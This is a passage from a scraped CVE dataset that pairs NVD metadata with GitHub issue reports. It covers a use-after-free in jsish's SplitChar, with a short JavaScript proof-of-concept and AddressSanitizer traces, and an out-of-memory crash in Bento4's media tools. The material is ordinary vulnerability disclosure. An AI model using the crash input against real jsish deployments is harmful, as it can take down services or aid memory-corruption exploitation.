(./jsish/jsish+0x42c9bd) 0x7f2d8707c900 is located 0 bytes to the right of 100000000-byte region [0x7f2d8111e800,0x7f2d8707c900) allocated by thread T0 here: #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419) #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15 SUMMARY: AddressSanitizer: heap-buffer-overflow (./jsish/jsish+0x49123d) in strcpy Shadow bytes around the buggy address: 0x0fe630e078d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e078e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e078f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e07900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e07910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fe630e07920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3965184==ABORTING ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei. --- end body --- comments : --- start comments --- --- end comments ---
4,153
CVE-2024-24189
2024-02-07T14:15:52.967
Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/101" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "Vendor Advisory" ]
[ "pcmacdon", "jsish" ]
Issue
###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ; JSON. parse ( parse ( JSON. stringify ) ) ; } catch ( a ) { } JSON. stringify ( + a ) ; ``` </p> </details> ```javascript // poc.js try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ; } catch ( a ) { } ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196 max alloc exceeded 211812340Jsi_DSSetLength src/jsiDString.c:196 ================================================================= ==3962909==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f069b6bb7e8 at pc 0x000000552d3a bp 0x7fff816e51c0 sp 0x7fff816e51b8 WRITE of size 8 at 0x7f069b6bb7e8 thread T0 #0 0x552d39 in SplitChar ./jsish/src/jsiUtils.c:2060:17 #1 0x552d39 in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16 #2 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9 #3 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22 #4 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10 #5 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17 #6 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25 #7 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10 #8 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c #9 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12 #10 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18 #11 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26 #12 0x7f06aa752082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #13 0x42c9bd in _start (./jsish/jsish+0x42c9bd) 0x7f069b6bb7e8 is located 5885928 bytes inside of 100000000-byte region [0x7f069b11e800,0x7f06a107c900) freed by thread T0 here: #0 0x4a4e7d in free (./jsish/jsish+0x4a4e7d) #1 0x6047d4 in Jsi_ObjFree ./jsish/src/jsiObj.c:326:17 previously allocated by thread T0 here: #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419) #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15 SUMMARY: AddressSanitizer: heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar Shadow bytes around the buggy address: 0x0fe1536cf6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0fe1536cf6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd 0x0fe1536cf700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3962909==ABORTING ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei.
heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar
https://api.github.com/repos/pcmacdon/jsish/issues/101/comments
0
2024-01-20T05:58:02Z
2024-01-20T05:58:02Z
https://github.com/pcmacdon/jsish/issues/101
2,091,919,351
101
[ -0.020732102915644646, -0.013694331049919128, 0.0028279379475861788, 0.013972909189760685, 0.017726387828588486, -0.007616921793669462, -0.01417817734181881, 0.019691098481416702, -0.03741748631000519, 0.018635433167219162, -0.02530665323138237, -0.005578900221735239, 0.010190106928348541, ...
1,113
This is a GitHub Issue repo:jsish owner:pcmacdon Title : heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar Issue date: --- start body --- ###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ; JSON. parse ( parse ( JSON. stringify ) ) ; } catch ( a ) { } JSON. stringify ( + a ) ; ``` </p> </details> ```javascript // poc.js try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ; } catch ( a ) { } ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196 max alloc exceeded 211812340Jsi_DSSetLength src/jsiDString.c:196 ================================================================= ==3962909==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f069b6bb7e8 at pc 0x000000552d3a bp 0x7fff816e51c0 sp 0x7fff816e51b8 WRITE of size 8 at 0x7f069b6bb7e8 thread T0 #0 0x552d39 in SplitChar ./jsish/src/jsiUtils.c:2060:17 #1 0x552d39 in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16 #2 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9 #3 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22 #4 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10 #5 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17 #6 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25 #7 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10 #8 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c #9 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12 #10 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18 #11 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26 #12 0x7f06aa752082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #13 0x42c9bd in _start (./jsish/jsish+0x42c9bd) 0x7f069b6bb7e8 is located 5885928 bytes inside of 100000000-byte region [0x7f069b11e800,0x7f06a107c900) freed by thread T0 here: #0 0x4a4e7d in free (./jsish/jsish+0x4a4e7d) #1 0x6047d4 in Jsi_ObjFree ./jsish/src/jsiObj.c:326:17 previously allocated by thread T0 here: #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419) #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15 SUMMARY: AddressSanitizer: heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar Shadow bytes around the buggy address: 0x0fe1536cf6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0fe1536cf6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd 0x0fe1536cf700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0fe1536cf740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3962909==ABORTING ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei. --- end body --- comments : --- start comments --- --- end comments ---
4,287
CVE-2024-25451
2024-02-09T15:15:09.143
Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_DataBuffer::ReallocateBuffer() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/872" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "Exploit", "Issue Tracking" ]
[ "axiomatic-systems", "Bento4" ]
Issue
Hi, Thanks for fixing the issue #741, but still there is out-of-memory bug in the latest version (1.6.0-640) of multiple programs because of the function AP4_DataBuffer::ReallocateBuffer() at Ap4DataBuffer.cpp:210. We observed the same bug in mp4info, mp42aac, mp42avc, mp4decrypt, and mp4dump with the same root cause. Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==977537==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x8021ffba bytes #0 0x7fb17bc08787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x557daf86f117 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x557daf86f319 in AP4_DataBuffer::SetDataSize(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:151 #3 0x557daf8c68b2 in AP4_AudioSampleEntry::ReadFields(AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:502 #4 0x557daf8c5d98 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:108 #5 0x557daf8cc2dd in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:420 #6 0x557daf8cc3d2 in AP4_MpegAudioSampleEntry::AP4_MpegAudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:655 #7 0x557daf8cc3d2 in AP4_Mp4aSampleEntry::AP4_Mp4aSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:844 #8 0x557daf850a3b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:286 #9 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x557daf8dbac4 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x557daf8dc09b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x557daf84f9d0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x557daf872856 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #20 0x557daf872c33 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #21 0x557daf84ecf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #22 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #23 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #24 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #25 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #26 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #27 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #28 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #29 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #30 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 ==977537==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==977537==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info, mp42aac, mp42avc, mp4decrypt, mp4dump ### How to reproduce $ mp4info, mp4dump} poc-file or $ {mp42aac, mp42avc, mp4decrypt} poc-file /dev/null poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11720958/poc-file.txt)
Out-of-memory bug from AP4_DataBuffer::ReallocateBuffer() in multiple programs (v1.6.0-640)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/872/comments
2
2023-06-12T09:44:14Z
2024-02-17T17:35:35Z
https://github.com/axiomatic-systems/Bento4/issues/872
1,752,341,840
872
[ -0.02937122993171215, 0.005020082928240299, -0.02078552357852459, 0.014139091596007347, 0.03377867862582207, 0.009290899150073528, -0.05613325163722038, 0.033584751188755035, -0.020997080951929092, 0.054370272904634476, 0.022072497755289078, 0.008475521579384804, 0.03515380248427391, 0.011...
1,114
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Out-of-memory bug from AP4_DataBuffer::ReallocateBuffer() in multiple programs (v1.6.0-640) Issue date: --- start body --- Hi, Thanks for fixing the issue #741, but still there is out-of-memory bug in the latest version (1.6.0-640) of multiple programs because of the function AP4_DataBuffer::ReallocateBuffer() at Ap4DataBuffer.cpp:210. We observed the same bug in mp4info, mp42aac, mp42avc, mp4decrypt, and mp4dump with the same root cause. Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==977537==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x8021ffba bytes #0 0x7fb17bc08787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x557daf86f117 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x557daf86f319 in AP4_DataBuffer::SetDataSize(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:151 #3 0x557daf8c68b2 in AP4_AudioSampleEntry::ReadFields(AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:502 #4 0x557daf8c5d98 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:108 #5 0x557daf8cc2dd in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:420 #6 0x557daf8cc3d2 in AP4_MpegAudioSampleEntry::AP4_MpegAudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:655 #7 0x557daf8cc3d2 in AP4_Mp4aSampleEntry::AP4_Mp4aSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:844 #8 0x557daf850a3b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:286 #9 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x557daf8dbac4 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x557daf8dc09b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x557daf84f9d0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x557daf872856 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #20 0x557daf872c33 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #21 0x557daf84ecf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #22 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #23 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #24 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #25 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #26 0x557daf84eca4 in 